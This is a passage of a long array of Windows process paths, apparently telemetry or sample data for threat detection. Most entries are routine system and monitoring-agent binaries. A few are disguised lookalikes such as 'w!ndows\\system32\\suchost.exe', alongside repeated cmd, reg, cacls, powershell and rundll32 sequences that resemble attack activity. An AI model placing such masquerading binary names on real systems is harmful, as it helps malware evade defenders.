60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\secedit.exe\",\"c:\\\\windows\\\\system32\\\\secedit.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\installagent.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\installagent.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\w